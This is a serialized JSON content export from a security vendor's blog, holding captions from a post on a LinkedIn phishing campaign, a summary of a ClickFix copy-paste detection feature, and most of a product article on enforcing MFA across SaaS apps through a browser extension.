0],{"nodeType":173,"value":58218,"marks":70581,"data":70582},[],{},{"nodeType":186,"data":70584,"content":70585},{"uri":8419},[70586],{"nodeType":173,"value":58225,"marks":70587,"data":70589},[70588],{"type":194},{},{"nodeType":173,"value":58230,"marks":70591,"data":70592},[],{},{"nodeType":186,"data":70594,"content":70595},{"uri":58235},[70596],{"nodeType":173,"value":58238,"marks":70597,"data":70599},[70598],{"type":194},{},{"nodeType":173,"value":58243,"marks":70601,"data":70602},[],{},{"nodeType":178,"data":70604,"content":70605},{},[70606],{"nodeType":173,"value":58250,"marks":70607,"data":70608},[],{},{"nodeType":235,"data":70610,"content":70611},{},[70612],{"nodeType":173,"value":58257,"marks":70613,"data":70615},[70614],{"type":370},{},{"nodeType":178,"data":70617,"content":70618},{},[70619,70622,70629],{"nodeType":173,"value":50021,"marks":70620,"data":70621},[],{},{"nodeType":186,"data":70623,"content":70624},{"uri":50026},[70625],{"nodeType":173,"value":50029,"marks":70626,"data":70628},[70627],{"type":194},{},{"nodeType":173,"value":50034,"marks":70630,"data":70631},[],{},{"nodeType":235,"data":70633,"content":70634},{},[70635],{"nodeType":173,"value":58281,"marks":70636,"data":70638},[70637],{"type":370},{},{"nodeType":178,"data":70640,"content":70641},{},[70642,70645,70652],{"nodeType":173,"value":58289,"marks":70643,"data":70644},[],{},{"nodeType":186,"data":70646,"content":70647},{"uri":50125},[70648],{"nodeType":173,"value":58296,"marks":70649,"data":70651},[70650],{"type":194},{},{"nodeType":173,"value":58301,"marks":70653,"data":70654},[],{},{"nodeType":312,"data":70656,"content":70659},{"target":70657},{"sys":70658},{"id":58308,"type":317,"linkType":318},[],{"nodeType":231,"data":70661,"content":70662},{},[],{"nodeType":169,"data":70664,"content":70665},{},[70666],{"nodeType":173,"value":8967,"marks":70667,"data":70669},[70668],{"type":370},{},{"nodeType":178,"data":70671,"content":70672},{},[70673,70676,70683],{"nodeType":173,"value":58324,"marks":70674,"data":70675},[],{},{"nodeType":186,"data":70677,"content":70678},{"uri":1764},[70679],{"nodeType":173,"value":58331,"marks":70680,"data":70682},[70681],{"type":194},{},{"nodeType":173,"value":58336,"marks":70684,"data":70685},[],{},{"nodeType":178,"data":70687,"content":70688},{},[70689],{"nodeType":173,"value":58343,"marks":70690,"data":70691},[],{},{"nodeType":312,"data":70693,"content":70696},{"target":70694},{"sys":70695},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":70698,"content":70699},{},[],{"nodeType":169,"data":70701,"content":70702},{},[70703],{"nodeType":173,"value":8517,"marks":70704,"data":70706},[70705],{"type":370},{},{"nodeType":178,"data":70708,"content":70709},{},[70710,70713,70720],{"nodeType":173,"value":8538,"marks":70711,"data":70712},[],{},{"nodeType":186,"data":70714,"content":70715},{"uri":6820},[70716],{"nodeType":173,"value":8545,"marks":70717,"data":70719},[70718],{"type":194},{},{"nodeType":173,"value":8550,"marks":70721,"data":70722},[],{},{"nodeType":178,"data":70724,"content":70725},{},[70726],{"nodeType":173,"value":26673,"marks":70727,"data":70728},[],{},{"nodeType":178,"data":70730,"content":70731},{},[70732],{"nodeType":173,"value":58387,"marks":70733,"data":70734},[],{},{"nodeType":312,"data":70736,"content":70739},{"target":70737},{"sys":70738},{"id":58394,"type":317,"linkType":318},[],{"nodeType":178,"data":70741,"content":70742},{},[70743,70746,70753,70756,70763],{"nodeType":173,"value":1451,"marks":70744,"data":70745},[],{},{"nodeType":186,"data":70747,"content":70748},{"uri":1456},[70749],{"nodeType":173,"value":1459,"marks":70750,"data":70752},[70751],{"type":194},{},{"nodeType":173,"value":1464,"marks":70754,"data":70755},[],{},{"nodeType":186,"data":70757,"content":70758},{"uri":1469},[70759],{"nodeType":173,"value":1472,"marks":70760,"data":70762},[70761],{"type":194},{},{"nodeType":173,"value":1477,"marks":70764,"data":70765},[],{},{"entries":70767},{"hyperlink":70768,"inline":70769,"block":70770},[],[],[70771,70797,70802,70807,70812,70818,70825,70850,70857,70859],{"sys":70772,"__typename":5311,"content":70773,"name":70796,"title":118},{"id":58033},{"json":70774},{"nodeType":165,"data":70775,"content":70776},{},[70777],{"nodeType":178,"data":70778,"content":70779},{},[70780,70784,70792],{"nodeType":173,"value":70781,"marks":70782,"data":70783},"This is the second blog post we’ve released on LinkedIn-based phishing attacks — ",[],{},{"nodeType":186,"data":70785,"content":70786},{"uri":1764},[70787],{"nodeType":173,"value":70788,"marks":70789,"data":70791},"read our last report",[70790],{"type":194},{},{"nodeType":173,"value":70793,"marks":70794,"data":70795}," to learn about a sophisticated spear-phishing campaign targeting tech company executives.",[],{},"Phishing blog post insight box 2",{"sys":70798,"__typename":5345,"title":70799,"caption":70799,"layoutMode":118,"file":70800},{"id":58089},"Custom landing page hosted on Firebase.",{"url":70801,"width":5358,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/5gjDDExYBbCZOIH4FcSONO/0bfd1bddd13fd5096f0a60b690803930/image4.png",{"sys":70803,"__typename":5345,"title":70804,"caption":70804,"layoutMode":118,"file":70805},{"id":58102},"The victim is prompted to click the link to “view with Microsoft”. ",{"url":70806,"width":5358,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/6Wm1lVmjX8WyLHmTP4sEpV/49b6d013ccde770b1b467dc16da01d45/image3.png",{"sys":70808,"__typename":5345,"title":70809,"caption":70809,"layoutMode":118,"file":70810},{"id":58115},"The phishing page is protected by Cloudflare Turnstile.",{"url":70811,"width":5358,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/4nxdRlox0ZOAqd3YWaIerI/245ffaec121d59d565aa4c6f073e590a/image2.png",{"sys":70813,"__typename":5345,"title":70814,"caption":70814,"layoutMode":118,"file":70815},{"id":58128},"AITM phishing page impersonating Microsoft.",{"url":70816,"width":5358,"height":70817},"https://images.ctfassets.net/y1cdw1ablpvd/2aLY3it2x1Vslss8uCDsOz/9f93644ece3f88fc3b8cd118c906257c/image6.png",1085,{"sys":70819,"__typename":5345,"title":70820,"caption":70820,"layoutMode":118,"file":70821},{"id":58141},"Detection Timeline provided by the Push platform.",{"url":70822,"width":70823,"height":70824},"https://images.ctfassets.net/y1cdw1ablpvd/2iD9HLNz1sLjMeXVm4BoWU/0072a2ad90de59cd5e2a373905be67e2/Frame_627987.png",908,788,{"sys":70826,"__typename":5311,"content":70827,"name":70849,"title":118},{"id":58176},{"json":70828},{"nodeType":165,"data":70829,"content":70830},{},[70831],{"nodeType":178,"data":70832,"content":70833},{},[70834,70838,70846],{"nodeType":173,"value":70835,"marks":70836,"data":70837},"Learn more about phishing detection evasion techniques in our recent whitepaper: ",[],{},{"nodeType":186,"data":70839,"content":70841},{"uri":70840},"https://pushsecurity.com/resources/phishing-evolution",[70842],{"nodeType":173,"value":70843,"marks":70844,"data":70845},"The Evolution of Phishing Attacks",[],{},{"nodeType":173,"value":1477,"marks":70847,"data":70848},[],{},"LinkedIn Phishing p2: Insight box 1",{"sys":70851,"__typename":5345,"title":70852,"caption":70852,"layoutMode":118,"file":70853},{"id":58308},"Randomly generated tab header text.",{"url":70854,"width":70855,"height":70856},"https://images.ctfassets.net/y1cdw1ablpvd/28EfPHtOCKnnIBLtAuHjDH/a441a96b328ed6228e096542a44092a8/image1.png",1430,208,{"sys":70858,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},{"sys":70860,"__typename":5434,"title":70861,"arcadeDemoUrl":70862,"playText":27947},{"id":58394},"LinkedIn Phishing Attack Stopped By Push","https://demo.arcade.software/C99MO1d824gs5anTRyIJ?embed","content:blog:new-phishing-campaign-identified-targeting-linkedin-users.json","blog/new-phishing-campaign-identified-targeting-linkedin-users.json","blog/new-phishing-campaign-identified-targeting-linkedin-users",{"_path":70867,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":70868,"ogImage":118,"summary":70870,"title":19633,"subtitle":70881,"metaTitle":70882,"synopsis":21724,"hashTags":118,"publishedDate":21725,"slug":19634,"tagsCollection":70883,"relatedBlogPostsCollection":70889,"authorsCollection":72262,"content":72266,"_id":72854,"_type":5439,"_source":5440,"_file":72855,"_stem":72856,"_extension":5439},"/blog/introducing-malicious-copy-paste-detection",{"id":18678,"publishedAt":70869},"2025-10-09T13:59:03.248Z",{"json":70871},{"data":70872,"content":70873,"nodeType":165},{},[70874],{"data":70875,"content":70876,"nodeType":178},{},[70877],{"data":70878,"marks":70879,"value":70880,"nodeType":173},{},[],"ClickFix, FileFix, fake CAPTCHA — whatever you call it, users interacting with malicious scripts in their web browser is a fast-growing source of security breaches. To tackle this threat, Push now detects malware delivery in the browser, supporting a layered defense against endpoint attacks. ","Detect ClickFix-style attacks where users copy malicious scripts from their browser.","Detect ClickFix-style attacks in the browser",{"items":70884},[70885,70887],{"sys":70886,"name":509},{"id":508},{"sys":70888,"name":505},{"id":504},{"items":70890},[70891,71178,71834],{"__typename":1528,"sys":70892,"content":70893,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":71167,"authorsCollection":71173},{"id":162},{"json":70894},{"nodeType":165,"data":70895,"content":70896},{},[70897,70903,70919,70932,70938,70944,70947,70953,70959,71007,71013,71018,71021,71027,71033,71039,71045,71051,71065,71070,71076,71082,71096,71101,71107,71113,71119,71125,71131,71134,71140,71156,71161],{"nodeType":169,"data":70898,"content":70899},{},[70900],{"nodeType":173,"value":174,"marks":70901,"data":70902},[],{},{"nodeType":178,"data":70904,"content":70905},{},[70906,70909,70916],{"nodeType":173,"value":182,"marks":70907,"data":70908},[],{},{"nodeType":186,"data":70910,"content":70911},{"uri":188},[70912],{"nodeType":173,"value":191,"marks":70913,"data":70915},[70914],{"type":194},{},{"nodeType":173,"value":197,"marks":70917,"data":70918},[],{},{"nodeType":178,"data":70920,"content":70921},{},[70922,70925,70929],{"nodeType":173,"value":204,"marks":70923,"data":70924},[],{},{"nodeType":173,"value":208,"marks":70926,"data":70928},[70927],{"type":194},{},{"nodeType":173,"value":213,"marks":70930,"data":70931},[],{},{"nodeType":178,"data":70933,"content":70934},{},[70935],{"nodeType":173,"value":220,"marks":70936,"data":70937},[],{},{"nodeType":178,"data":70939,"content":70940},{},[70941],{"nodeType":173,"value":227,"marks":70942,"data":70943},[],{},{"nodeType":231,"data":70945,"content":70946},{},[],{"nodeType":235,"data":70948,"content":70949},{},[70950],{"nodeType":173,"value":239,"marks":70951,"data":70952},[],{},{"nodeType":178,"data":70954,"content":70955},{},[70956],{"nodeType":173,"value":246,"marks":70957,"data":70958},[],{},{"nodeType":250,"data":70960,"content":70961},{},[70962,70971,70980,70989,70998],{"nodeType":254,"data":70963,"content":70964},{},[70965],{"nodeType":178,"data":70966,"content":70967},{},[70968],{"nodeType":173,"value":261,"marks":70969,"data":70970},[],{},{"nodeType":254,"data":70972,"content":70973},{},[70974],{"nodeType":178,"data":70975,"content":70976},{},[70977],{"nodeType":173,"value":271,"marks":70978,"data":70979},[],{},{"nodeType":254,"data":70981,"content":70982},{},[70983],{"nodeType":178,"data":70984,"content":70985},{},[70986],{"nodeType":173,"value":281,"marks":70987,"data":70988},[],{},{"nodeType":254,"data":70990,"content":70991},{},[70992],{"nodeType":178,"data":70993,"content":70994},{},[70995],{"nodeType":173,"value":291,"marks":70996,"data":70997},[],{},{"nodeType":254,"data":70999,"content":71000},{},[71001],{"nodeType":178,"data":71002,"content":71003},{},[71004],{"nodeType":173,"value":301,"marks":71005,"data":71006},[],{},{"nodeType":178,"data":71008,"content":71009},{},[71010],{"nodeType":173,"value":308,"marks":71011,"data":71012},[],{},{"nodeType":312,"data":71014,"content":71017},{"target":71015},{"sys":71016},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":71019,"content":71020},{},[],{"nodeType":235,"data":71022,"content":71023},{},[71024],{"nodeType":173,"value":327,"marks":71025,"data":71026},[],{},{"nodeType":178,"data":71028,"content":71029},{},[71030],{"nodeType":173,"value":334,"marks":71031,"data":71032},[],{},{"nodeType":178,"data":71034,"content":71035},{},[71036],{"nodeType":173,"value":341,"marks":71037,"data":71038},[],{},{"nodeType":178,"data":71040,"content":71041},{},[71042],{"nodeType":173,"value":348,"marks":71043,"data":71044},[],{},{"nodeType":178,"data":71046,"content":71047},{},[71048],{"nodeType":173,"value":355,"marks":71049,"data":71050},[],{},{"nodeType":235,"data":71052,"content":71053},{},[71054,71057,71062],{"nodeType":173,"value":362,"marks":71055,"data":71056},[],{},{"nodeType":173,"value":366,"marks":71058,"data":71061},[71059,71060],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":71063,"data":71064},[],{},{"nodeType":312,"data":71066,"content":71069},{"target":71067},{"sys":71068},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":71071,"content":71072},{},[71073],{"nodeType":173,"value":386,"marks":71074,"data":71075},[],{},{"nodeType":178,"data":71077,"content":71078},{},[71079],{"nodeType":173,"value":393,"marks":71080,"data":71081},[],{},{"nodeType":235,"data":71083,"content":71084},{},[71085,71088,71093],{"nodeType":173,"value":400,"marks":71086,"data":71087},[],{},{"nodeType":173,"value":404,"marks":71089,"data":71092},[71090,71091],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":71094,"data":71095},[],{},{"nodeType":312,"data":71097,"content":71100},{"target":71098},{"sys":71099},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":71102,"content":71103},{},[71104],{"nodeType":173,"value":423,"marks":71105,"data":71106},[],{},{"nodeType":178,"data":71108,"content":71109},{},[71110],{"nodeType":173,"value":430,"marks":71111,"data":71112},[],{},{"nodeType":178,"data":71114,"content":71115},{},[71116],{"nodeType":173,"value":437,"marks":71117,"data":71118},[],{},{"nodeType":178,"data":71120,"content":71121},{},[71122],{"nodeType":173,"value":444,"marks":71123,"data":71124},[],{},{"nodeType":178,"data":71126,"content":71127},{},[71128],{"nodeType":173,"value":451,"marks":71129,"data":71130},[],{},{"nodeType":231,"data":71132,"content":71133},{},[],{"nodeType":169,"data":71135,"content":71136},{},[71137],{"nodeType":173,"value":461,"marks":71138,"data":71139},[],{},{"nodeType":178,"data":71141,"content":71142},{},[71143,71146,71153],{"nodeType":173,"value":468,"marks":71144,"data":71145},[],{},{"nodeType":186,"data":71147,"content":71148},{"uri":473},[71149],{"nodeType":173,"value":476,"marks":71150,"data":71152},[71151],{"type":194},{},{"nodeType":173,"value":481,"marks":71154,"data":71155},[],{},{"nodeType":312,"data":71157,"content":71160},{"target":71158},{"sys":71159},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":71162,"content":71163},{},[71164],{"nodeType":173,"value":37,"marks":71165,"data":71166},[],{},{"items":71168},[71169,71171],{"sys":71170,"name":505},{"id":504},{"sys":71172,"name":509},{"id":508},{"items":71174},[71175],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":71177},"Alex",{"url":516},{"__typename":1528,"sys":71179,"content":71180,"title":46318,"synopsis":71822,"hashTags":118,"publishedDate":71823,"slug":46319,"tagsCollection":71824,"authorsCollection":71830},{"id":24787},{"json":71181},{"nodeType":165,"data":71182,"content":71183},{},[71184,71190,71193,71200,71223,71254,71264,71283,71290,71296,71303,71318,71325,71328,71335,71342,71361,71368,71413,71420,71426,71432,71439,71472,71486,71489,71496,71503,71510,71517,71524,71531,71538,71645,71651,71666,71673,71688,71721,71736,71743,71758,71764,71771,71778,71784,71791,71797,71804],{"nodeType":312,"data":71185,"content":71189},{"target":71186},{"sys":71187},{"id":71188,"type":317,"linkType":318},"1hUpsNwuhEXwSPijvRflTq",[],{"nodeType":231,"data":71191,"content":71192},{},[],{"nodeType":178,"data":71194,"content":71195},{},[71196],{"nodeType":173,"value":71197,"marks":71198,"data":71199},"There are two things every security operations engineer can agree on:",[],{},{"nodeType":250,"data":71201,"content":71202},{},[71203,71213],{"nodeType":254,"data":71204,"content":71205},{},[71206],{"nodeType":178,"data":71207,"content":71208},{},[71209],{"nodeType":173,"value":71210,"marks":71211,"data":71212},"Get MFA on every account on every app.",[],{},{"nodeType":254,"data":71214,"content":71215},{},[71216],{"nodeType":178,"data":71217,"content":71218},{},[71219],{"nodeType":173,"value":71220,"marks":71221,"data":71222},"This is stupidly harder to achieve than it seems.",[],{},{"nodeType":178,"data":71224,"content":71225},{},[71226,71230,71238,71242,71250],{"nodeType":173,"value":71227,"marks":71228,"data":71229},"The penalties for failing to solve this hard simple problem are abundantly clear. Stolen credentials accounted for roughly half of the initial access methods observed this year across 30,000+ attacks, according to Verizon’s 2024 ",[],{},{"nodeType":186,"data":71231,"content":71232},{"uri":1297},[71233],{"nodeType":173,"value":71234,"marks":71235,"data":71237},"Data Breach Investigations Report",[71236],{"type":194},{},{"nodeType":173,"value":71239,"marks":71240,"data":71241},". And ",[],{},{"nodeType":186,"data":71243,"content":71245},{"uri":71244},"https://pushsecurity.com/blog/2024-identity-breaches/",[71246],{"nodeType":173,"value":71247,"marks":71248,"data":71249},"in a review of 30 publicly disclosed breaches involving identity attacks",[],{},{"nodeType":173,"value":71251,"marks":71252,"data":71253}," in 2024, we found that 73% (almost three-quarters) were the result of compromised credentials, with the rest the result of phishing. ",[],{},{"nodeType":3769,"data":71255,"content":71256},{},[71257],{"nodeType":178,"data":71258,"content":71259},{},[71260],{"nodeType":173,"value":71261,"marks":71262,"data":71263},"Three-quarters of publicly disclosed breaches involving identity attacks in 2024 involved compromised credentials and missing MFA.",[],{},{"nodeType":178,"data":71265,"content":71266},{},[71267,71271,71279],{"nodeType":173,"value":71268,"marks":71269,"data":71270},"In the case of the ",[],{},{"nodeType":186,"data":71272,"content":71273},{"uri":819},[71274],{"nodeType":173,"value":71275,"marks":71276,"data":71278},"Snowflake incident",[71277],{"type":194},{},{"nodeType":173,"value":71280,"marks":71281,"data":71282}," earlier this year, a lack of MFA meant the difference between an enormous and murky firefight to clean up accounts breached with legitimate credentials, and a decent night’s sleep. The result was hundreds of millions of breached customer records, nine publicly named victims, and at least one ransom paid.",[],{},{"nodeType":178,"data":71284,"content":71285},{},[71286],{"nodeType":173,"value":71287,"marks":71288,"data":71289},"“Do you know how many accounts we have on this third-party service, who owns them, how many tenants, whether those creds are shared elsewhere, and their security posture?” is not a fun question to answer on a Friday. ",[],{},{"nodeType":312,"data":71291,"content":71295},{"target":71292},{"sys":71293},{"id":71294,"type":317,"linkType":318},"6hg6PLXWMZaEDnGekHEzmD",[],{"nodeType":178,"data":71297,"content":71298},{},[71299],{"nodeType":173,"value":71300,"marks":71301,"data":71302},"For SecOps teams we’ve helped here at Push that responded to incidents affecting third-party apps (like Snowflake), the first item on the recovery plan is to finally solve that hard simple problem: No more MFA gaps.",[],{},{"nodeType":178,"data":71304,"content":71305},{},[71306,71310,71314],{"nodeType":173,"value":71307,"marks":71308,"data":71309},"With our latest feature release, ",[],{},{"nodeType":173,"value":2570,"marks":71311,"data":71313},[71312],{"type":370},{},{"nodeType":173,"value":71315,"marks":71316,"data":71317},", this is so much easier. With MFA enforcement, Push administrators can configure a control to prompt employees to enroll in MFA whenever Push detects that they’re not registered — even on apps that don’t natively provide any administrative enforcement option for MFA. This capability is made possible by the Push browser extension, which uses in-browser messaging and simple workflows to guide users right where they work.",[],{},{"nodeType":178,"data":71319,"content":71320},{},[71321],{"nodeType":173,"value":71322,"marks":71323,"data":71324},"In this article, we’ll cover how Push helps you identify and close MFA gaps, how our new enforcement feature is one part of that solution, and how you can test the platform yourself.",[],{},{"nodeType":231,"data":71326,"content":71327},{},[],{"nodeType":169,"data":71329,"content":71330},{},[71331],{"nodeType":173,"value":71332,"marks":71333,"data":71334},"Shining a light on MFA gaps",[],{},{"nodeType":178,"data":71336,"content":71337},{},[71338],{"nodeType":173,"value":71339,"marks":71340,"data":71341},"There’s no question that the rise of ubiquitous multi-factor authentication has been an enormous advance for defenders in cybersecurity. ",[],{},{"nodeType":178,"data":71343,"content":71344},{},[71345,71349,71358],{"nodeType":173,"value":71346,"marks":71347,"data":71348},"Yet several years into this journey, the problem of verifying and enforcing MFA coverage across an organization remains a bit of a ",[],{},{"nodeType":186,"data":71350,"content":71352},{"uri":71351},"https://en.wikipedia.org/wiki/Puzzle_box",[71353],{"nodeType":173,"value":71354,"marks":71355,"data":71357},"puzzle box",[71356],{"type":194},{},{"nodeType":173,"value":1477,"marks":71359,"data":71360},[],{},{"nodeType":178,"data":71362,"content":71363},{},[71364],{"nodeType":173,"value":71365,"marks":71366,"data":71367},"Why is this?",[],{},{"nodeType":250,"data":71369,"content":71370},{},[71371,71381,71391],{"nodeType":254,"data":71372,"content":71373},{},[71374],{"nodeType":178,"data":71375,"content":71376},{},[71377],{"nodeType":173,"value":71378,"marks":71379,"data":71380},"Complex overlapping (and occasionally contradictory) configurations for enterprise MFA solutions can result in entire employee groups not registered for MFA, and other critical missing pieces.",[],{},{"nodeType":254,"data":71382,"content":71383},{},[71384],{"nodeType":178,"data":71385,"content":71386},{},[71387],{"nodeType":173,"value":71388,"marks":71389,"data":71390},"With a sprawling ecosystem of both SSO-managed and unmanaged self-adopted SaaS, MFA coverage ends up looking more like a patchwork than a unified layer of protection. Security teams lack visibility of freemium and self-purchased apps, and when signup is simple, many users will naturally skip MFA registration to remove a layer of friction. The end result is often a suite of core apps managed via SSO that enforce MFA — and a lot of other unmanaged apps that don’t (true nightmare fodder).",[],{},{"nodeType":254,"data":71392,"content":71393},{},[71394],{"nodeType":178,"data":71395,"content":71396},{},[71397,71401,71409],{"nodeType":173,"value":71398,"marks":71399,"data":71400},"Another annoying piece of the puzzle box: Even in organizations with a high adoption rate of phishing-resistant MFA methods, having backup MFA methods (and a lack of total visibility into all of those registered methods) can create situations where ",[],{},{"nodeType":186,"data":71402,"content":71403},{"uri":61157},[71404],{"nodeType":173,"value":71405,"marks":71406,"data":71408},"MFA downgrade attacks",[71407],{"type":194},{},{"nodeType":173,"value":71410,"marks":71411,"data":71412}," are still possible. In MFA downgrade attacks, backup MFA methods that are less secure such as SMS or TOTP can be exploited, effectively bypassing more phishing-resistant methods.",[],{},{"nodeType":178,"data":71414,"content":71415},{},[71416],{"nodeType":173,"value":71417,"marks":71418,"data":71419},"The challenges of solving this puzzle are evident. ",[],{},{"nodeType":312,"data":71421,"content":71425},{"target":71422},{"sys":71423},{"id":71424,"type":317,"linkType":318},"2BBiFx8pHjSCeLTlP6n6da",[],{"nodeType":312,"data":71427,"content":71431},{"target":71428},{"sys":71429},{"id":71430,"type":317,"linkType":318},"2QnWVpPYRyJQaQ5TuKSSLp",[],{"nodeType":178,"data":71433,"content":71434},{},[71435],{"nodeType":173,"value":71436,"marks":71437,"data":71438},"To shine a light on MFA gaps, then, security teams need three things:",[],{},{"nodeType":250,"data":71440,"content":71441},{},[71442,71452,71462],{"nodeType":254,"data":71443,"content":71444},{},[71445],{"nodeType":178,"data":71446,"content":71447},{},[71448],{"nodeType":173,"value":71449,"marks":71450,"data":71451},"A full accounting of their identity attack surface, including accounts on unmanaged and freemium apps not on SSO.",[],{},{"nodeType":254,"data":71453,"content":71454},{},[71455],{"nodeType":178,"data":71456,"content":71457},{},[71458],{"nodeType":173,"value":71459,"marks":71460,"data":71461},"A trustworthy out-of-band method for verifying MFA coverage, beyond the tangle of conditional access rules.",[],{},{"nodeType":254,"data":71463,"content":71464},{},[71465],{"nodeType":178,"data":71466,"content":71467},{},[71468],{"nodeType":173,"value":71469,"marks":71470,"data":71471},"Visibility into which MFA methods are registered to a given account.",[],{},{"nodeType":178,"data":71473,"content":71474},{},[71475,71479,71483],{"nodeType":173,"value":71476,"marks":71477,"data":71478},"You can get all three with the Push platform. The missing piece we’ve now added is a way to automatically prompt employees to add MFA wherever it’s missing. Enter ",[],{},{"nodeType":173,"value":2570,"marks":71480,"data":71482},[71481],{"type":370},{},{"nodeType":173,"value":1477,"marks":71484,"data":71485},[],{},{"nodeType":231,"data":71487,"content":71488},{},[],{"nodeType":169,"data":71490,"content":71491},{},[71492],{"nodeType":173,"value":71493,"marks":71494,"data":71495},"How Push helps you ensure MFA coverage",[],{},{"nodeType":178,"data":71497,"content":71498},{},[71499],{"nodeType":173,"value":71500,"marks":71501,"data":71502},"Let’s take a look at a hypothetical incident response scenario to see how Push’s identity visibility and security controls help you ensure MFA coverage.",[],{},{"nodeType":178,"data":71504,"content":71505},{},[71506],{"nodeType":173,"value":71507,"marks":71508,"data":71509},"We’ll assume that prior to this incident, you had already deployed the Push browser extension, which you can install and enforce using any MDM solution, on all major browsers.",[],{},{"nodeType":178,"data":71511,"content":71512},{},[71513],{"nodeType":173,"value":71514,"marks":71515,"data":71516},"It’s a Friday afternoon (sorry).",[],{},{"nodeType":178,"data":71518,"content":71519},{},[71520],{"nodeType":173,"value":71521,"marks":71522,"data":71523},"News breaks that there’s been a suspected breach at a popular enterprise SaaS service.",[],{},{"nodeType":178,"data":71525,"content":71526},{},[71527],{"nodeType":173,"value":71528,"marks":71529,"data":71530},"You’re familiar with the service, but you don’t believe it’s a core managed app at your organization. Unfortunately, that does not mean you don’t have accounts (sorry again).",[],{},{"nodeType":178,"data":71532,"content":71533},{},[71534],{"nodeType":173,"value":71535,"marks":71536,"data":71537},"Using Push, you can:",[],{},{"nodeType":250,"data":71539,"content":71540},{},[71541,71560,71570,71597,71623],{"nodeType":254,"data":71542,"content":71543},{},[71544],{"nodeType":178,"data":71545,"content":71546},{},[71547,71551,71556],{"nodeType":173,"value":71548,"marks":71549,"data":71550},"Immediately check whether the Push extension has observed employee usage of the breached app. It will appear on the ",[],{},{"nodeType":173,"value":71552,"marks":71553,"data":71555},"Apps",[71554],{"type":370},{},{"nodeType":173,"value":71557,"marks":71558,"data":71559}," table. From this overview, you can see how many accounts Push has seen on that app and how they are accessing it (SSO vs. other methods, such as local password login).",[],{},{"nodeType":254,"data":71561,"content":71562},{},[71563],{"nodeType":178,"data":71564,"content":71565},{},[71566],{"nodeType":173,"value":71567,"marks":71568,"data":71569},"For those accounts on the breached app, you can quickly see whether they have MFA, and which methods are registered. To determine MFA status, the Push extension uses the existing user’s active session on an app to query that account’s MFA registration status using the app’s own API, providing a trustworthy verification. ",[],{},{"nodeType":254,"data":71571,"content":71572},{},[71573],{"nodeType":178,"data":71574,"content":71575},{},[71576,71580,71585,71589,71594],{"nodeType":173,"value":71577,"marks":71578,"data":71579},"You can also see whether the users’ passwords have any security issues, such as a verified stolen credential, or a password that’s weak or reused by filtering the ",[],{},{"nodeType":173,"value":71581,"marks":71582,"data":71584},"Accounts",[71583],{"type":370},{},{"nodeType":173,"value":71586,"marks":71587,"data":71588}," list for ",[],{},{"nodeType":173,"value":71590,"marks":71591,"data":71593},"Findings",[71592],{"type":370},{},{"nodeType":173,"value":1477,"marks":71595,"data":71596},[],{},{"nodeType":254,"data":71598,"content":71599},{},[71600],{"nodeType":178,"data":71601,"content":71602},{},[71603,71607,71611,71615,71619],{"nodeType":173,"value":71604,"marks":71605,"data":71606},"For accounts that lack MFA, you can then configure the ",[],{},{"nodeType":173,"value":2570,"marks":71608,"data":71610},[71609],{"type":370},{},{"nodeType":173,"value":71612,"marks":71613,"data":71614}," control from the ",[],{},{"nodeType":173,"value":18649,"marks":71616,"data":71618},[71617],{"type":370},{},{"nodeType":173,"value":71620,"marks":71621,"data":71622}," page. This will prompt employees who lack MFA to set it up whenever they next use the app. In parallel, you can reach out to affected employees through your preferred comms channel and ask them to immediately register for MFA and change their password on the app. ",[],{},{"nodeType":254,"data":71624,"content":71625},{},[71626],{"nodeType":178,"data":71627,"content":71628},{},[71629,71633,71642],{"nodeType":173,"value":71630,"marks":71631,"data":71632},"Then use Push’s webhooks to monitor for MFA registrations and password changes to roll in, by querying the ",[],{},{"nodeType":186,"data":71634,"content":71636},{"uri":71635},"https://pushsecurity.redoc.ly/webhooks-v1#operation/login-event",[71637],{"nodeType":173,"value":71638,"marks":71639,"data":71641},"Login event",[71640],{"type":194},{},{"nodeType":173,"value":1477,"marks":71643,"data":71644},[],{},{"nodeType":312,"data":71646,"content":71650},{"target":71647},{"sys":71648},{"id":71649,"type":317,"linkType":318},"4OVJU6FRSVU9j1WB9NGyJ4",[],{"nodeType":178,"data":71652,"content":71653},{},[71654,71658,71662],{"nodeType":173,"value":71655,"marks":71656,"data":71657},"By combining visibility of your workforce identities — including granular context on their MFA registration status, MFA methods, and password security, even on unmanaged apps — with in-browser controls like ",[],{},{"nodeType":173,"value":2570,"marks":71659,"data":71661},[71660],{"type":370},{},{"nodeType":173,"value":71663,"marks":71664,"data":71665},", Push helps security teams respond quickly and with assurance that they have the right information and tools to remediate the issue.",[],{},{"nodeType":169,"data":71667,"content":71668},{},[71669],{"nodeType":173,"value":71670,"marks":71671,"data":71672},"A closer look at MFA enforcement",[],{},{"nodeType":178,"data":71674,"content":71675},{},[71676,71680,71684],{"nodeType":173,"value":71677,"marks":71678,"data":71679},"With the in-browser ",[],{},{"nodeType":173,"value":2570,"marks":71681,"data":71683},[71682],{"type":370},{},{"nodeType":173,"value":71685,"marks":71686,"data":71687}," control, we chose this approach to close the loop on missing MFA issues because:",[],{},{"nodeType":250,"data":71689,"content":71690},{},[71691,71701,71711],{"nodeType":254,"data":71692,"content":71693},{},[71694],{"nodeType":178,"data":71695,"content":71696},{},[71697],{"nodeType":173,"value":71698,"marks":71699,"data":71700},"It meets users where they are, in the most relevant context where they can successfully address the issue.",[],{},{"nodeType":254,"data":71702,"content":71703},{},[71704],{"nodeType":178,"data":71705,"content":71706},{},[71707],{"nodeType":173,"value":71708,"marks":71709,"data":71710},"It solves the problem of enforcing MFA on apps that are outside of administrative control — or that don’t provide any administrative controls to enforce MFA registration natively.",[],{},{"nodeType":254,"data":71712,"content":71713},{},[71714],{"nodeType":178,"data":71715,"content":71716},{},[71717],{"nodeType":173,"value":71718,"marks":71719,"data":71720},"It’s tenant-agnostic. That means that you can enforce MFA for a given 